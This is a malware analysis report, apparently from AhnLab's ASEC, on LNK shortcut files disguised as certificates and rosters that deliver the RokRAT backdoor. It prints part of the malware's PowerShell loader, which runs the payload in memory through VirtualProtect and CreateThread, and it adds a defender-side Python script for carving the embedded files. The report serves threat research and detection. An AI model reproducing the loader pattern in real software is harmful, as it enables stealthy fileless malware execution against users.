LNK File Disguised as Certificate Distributing RokRAT Malware
AhnLab SEcurity intelligence Center (ASEC) has confirmed the continuous distribution of shortcut files (*.LNK) of abnormal sizes that disseminate backdoor-type malware. The recently confirmed shortcut files (*.LNK) are found to be targeting South Korean users, particularly those related to North Korea. The confirmed LNK file names are as follows:
- National Information Academy 8th Integrated Course Certificate (Final).lnk
- Gate access roster 2024.lnk
- Northeast Project (US Congressional Research Service (CRS Report).lnk
- Facility list.lnk

The confirmed LNK files contain a command that executes PowerShell via CMD, and they are of the same type as the one described in “RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)” [1], posted last year. A notable characteristic of this type is that the LNK file carries a legitimate document file, script code, and malicious PE data inside itself.


The simplified operation process of the malware is as shown below.

When the LNK file is executed, it runs PowerShell commands to create and execute a legitimate document file.

Afterward, it creates 3 files in the %public% folder. The names and features of the files created in this step are as follows.
| File name | Location in LNK File | Feature |
|---|---|---|
| viewer.dat | 0x2BC97 (size:0xD9402) | Encoded RokRAT malware |
| search.dat | 0x105099 (size:0x5AA) | Executes viewer.dat file |
| find.bat | 0x105643 (size:0x139) | Executes search.dat file |
Table 1. List of created files
The first executed item is “find.bat”, which runs “search.dat” via PowerShell. “search.dat” reads the “viewer.dat” file and executes it in a fileless manner.
```powershell
# Read the encoded payload that was dropped to %public%\viewer.dat
$exePath=$env:public+'\'+'viewer.dat';
$exeFile = Get-Content -path $exePath -encoding byte;
[Net.ServicePointManager]::SecurityProtocol = [Enum]::ToObject([Net.SecurityProtocolType], 3072);
$k1123 = [System.Text.Encoding]::UTF8.GetString(34) + 'kernel32.dll' + [System.Text.Encoding]::UTF8.GetString(34);
# <omitted>
# Allocate a buffer, mark it executable, copy the payload in, and run it on a new thread
$byteCount = $exeFile.Length;
$buffer = $b::GlobalAlloc(0x0040, $byteCount + 0x100);
$old = 0;
$a90234sb::VirtualProtect($buffer, $byteCount + 0x100, 0x40, [ref]$old);
for($i = 0;$i -lt $byteCount;$i++) {
[System.Runtime.InteropServices.Marshal]::WriteByte($buffer, $i, $exeFile[$i]); };
$handle = $cake3sd23::CreateThread(0, 0, $buffer, 0, 0, 0);
$fried3sd23::WaitForSingleObject($handle, 500 * 1000);
```
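As an added defender-side example (not code from the ASEC post), the Python script below triages a shortcut the way an analyst would handle this sample: it checks the Shell Link header, flags the abnormal size, and carves the three embedded files at the Table 1 offsets, hashing each for later lookup. The 64 KB threshold and the zero-filled stand-in built by `build_sample()` are assumptions; the carved data consists of constructed markers, not the real payload.

```python
import hashlib

# Shell Link header: HeaderSize (0x4C, little-endian) followed by the fixed
# LinkCLSID {00021401-0000-0000-C000-000000000046} as stored on disk.
LNK_MAGIC = bytes.fromhex("4C000000" "0114020000000000C000000000000046")

# Offsets and sizes of the files carried inside the LNK, from Table 1.
TABLE1_LAYOUT = {
    "viewer.dat": (0x2BC97, 0xD9402),  # encoded RokRAT payload
    "search.dat": (0x105099, 0x5AA),   # PowerShell loader script
    "find.bat":   (0x105643, 0x139),   # batch launcher
}

# Assumption (ours, not ASEC's): a benign shortcut is a few KB, so anything
# above this is an "abnormal size" LNK worth a closer look.
SUSPICIOUS_SIZE = 64 * 1024

def layout_is_contiguous(layout=TABLE1_LAYOUT) -> bool:
    """True if each embedded file starts exactly where the previous one ends."""
    r = sorted(layout.values())
    return all(r[i][0] + r[i][1] == r[i + 1][0] for i in range(len(r) - 1))

def carve_lnk(data: bytes, layout=TABLE1_LAYOUT) -> dict:
    """Triage one shortcut: header check, size check, then carve the embedded
    files at the known offsets and hash each one for later lookup."""
    report = {"is_lnk": data.startswith(LNK_MAGIC), "size": len(data),
              "oversized": len(data) > SUSPICIOUS_SIZE, "parts": {}}
    for name, (off, size) in layout.items():
        if off + size > len(data):
            raise ValueError(f"{name}: {off:#x}+{size:#x} lies past end of file")
        chunk = data[off:off + size]
        report["parts"][name] = {"data": chunk,
                                 "sha256": hashlib.sha256(chunk).hexdigest()}
    return report

def build_sample() -> bytes:
    """Constructed stand-in for the malicious LNK: valid header, zero fill and a
    short name marker at each Table 1 offset. It holds no real payload."""
    end = max(off + size for off, size in TABLE1_LAYOUT.values())
    buf = bytearray(end)
    buf[:len(LNK_MAGIC)] = LNK_MAGIC
    for name, (off, _) in TABLE1_LAYOUT.items():
        buf[off:off + len(name)] = name.encode()
    return bytes(buf)

if __name__ == "__main__":
    rep = carve_lnk(build_sample())
    print(rep["is_lnk"], rep["oversized"], {n: p["sha256"][:12] for n, p in rep["parts"].items()})
```

Running it against the real sample (with the same offsets) would yield the actual hashes of the three dropped files without ever executing the shortcut.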
The data of “viewer.dat” that is ultimately executed is the RokRAT malware, which is a backdoor-type malware capable of utilizing cloud APIs to collect user information and perform various malicious behaviors at the threat actor’s command.
The collected information is transmitted to the threat actor’s cloud server via cloud services such as pCloud, Yandex, and Dropbox. In these requests, the User-Agent header is disguised as Googlebot, and the cloud URLs used are listed in the table below.
- User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Table 2. Details on the cloud URLs used
The malicious behaviors that can be executed according to the threat actor’s command include:
- Execution of cmd commands
- Collection of directory listings
- Deletion of specific files (with VBS, CMD, BAT, and LNK extensions) within the Startup folder
- Collection of Startup folder listings, %APPDATA% folder listings, and recently used file listings
- Collection of PC information (system information, IP, router information, etc.)
Additionally, various other malicious behaviors can be performed, and the collected information is stored in the %TEMP% folder before being uploaded to the threat actor’s cloud server. The email addresses of the threat actor identified during the analysis process are as follows.
- tanessha.samuel@gmail[.]com
- tianling0315@gmail[.]com
- w.sarah0808@gmail[.]com
- softpower21cs@gmail[.]com
Through its blog, ASEC has consistently shared information about the distribution of malicious shortcut files, as such incidents occur frequently. In particular, malware targeting individuals associated with Korean unification, the military, and education has been identified continuously for a long time, so extra caution is required.
[File Detection]
Dropper/LNK.S2343 (2024.04.12.03)
Trojan/BAT.Runner (2024.04.12.00)
Trojan/Script.Generic (2024.04.12.00)
Data/BIN.EncPe (2024.04.12.00)
Infostealer/Win.Agent.R579429 (2023.05.05.01)